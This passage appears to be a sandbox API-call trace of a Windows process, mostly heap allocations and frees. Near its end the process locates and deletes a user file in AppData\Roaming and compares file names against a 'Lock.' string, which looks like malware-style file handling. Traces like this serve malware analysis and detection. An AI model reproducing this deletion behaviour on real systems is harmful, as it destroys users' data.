dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0236.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0236.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0236.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0236.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0236.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0236.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0236.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0236.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0236.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0236.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0236.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0236.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0236.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.803] CloseHandle (hObject=0x2a0) returned 1 [0236.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0236.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0236.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0236.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0236.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0236.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0236.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0236.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0236.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0236.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0236.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0236.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0236.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54050 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0236.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0236.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0236.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0236.812] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0236.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0236.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0236.888] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0236.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0236.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0236.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0236.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0236.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0236.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0236.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0236.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0236.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0236.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0236.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0236.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0236.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0236.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0236.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0236.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e564e0 [0236.890] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/pROXe.ods", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\pROXe.ods", lpFilePart=0x8cedf4*="pROXe.ods") returned 0x29 [0236.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0236.890] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\pROXe.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\proxe.ods")) returned 0x20 [0236.891] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\pROXe.ods", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ea2b20, ftCreationTime.dwHighDateTime=0x1d5ef19, ftLastAccessTime.dwLowDateTime=0x97626bc0, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0x97626bc0, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0x7aa, dwReserved0=0x1, dwReserved1=0x1c, cFileName="pROXe.ods", cAlternateFileName="")) returned 0xa87250 [0236.891] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\pROXe.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\proxe.ods")) returned 1 [0236.943] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ea2b20, ftCreationTime.dwHighDateTime=0x1d5ef19, ftLastAccessTime.dwLowDateTime=0x97626bc0, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0x97626bc0, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0x7aa, dwReserved0=0x1, dwReserved1=0x1c, cFileName="pROXe.ods", cAlternateFileName="")) returned 0 [0236.943] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0236.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0236.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0236.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0236.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0236.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0236.943] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0236.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0236.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0236.943] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0236.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0236.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0236.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0236.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0236.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0236.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0236.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0236.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0236.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0236.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0236.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0236.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e564e0 [0236.944] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/pROXe.ods", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\pROXe.ods", lpFilePart=0x8cf650*="pROXe.ods") returned 0x29 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0236.944] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\pROXe.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\proxe.ods")) returned 0xffffffff [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0236.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0236.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0236.945] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0236.945] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.945] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0236.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0236.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0236.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0236.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0236.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0236.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0236.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0236.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0236.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0236.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PXFkhPM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0236.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XFkhPM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0236.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FkhPM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0236.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khPM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0236.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hPM.gif", 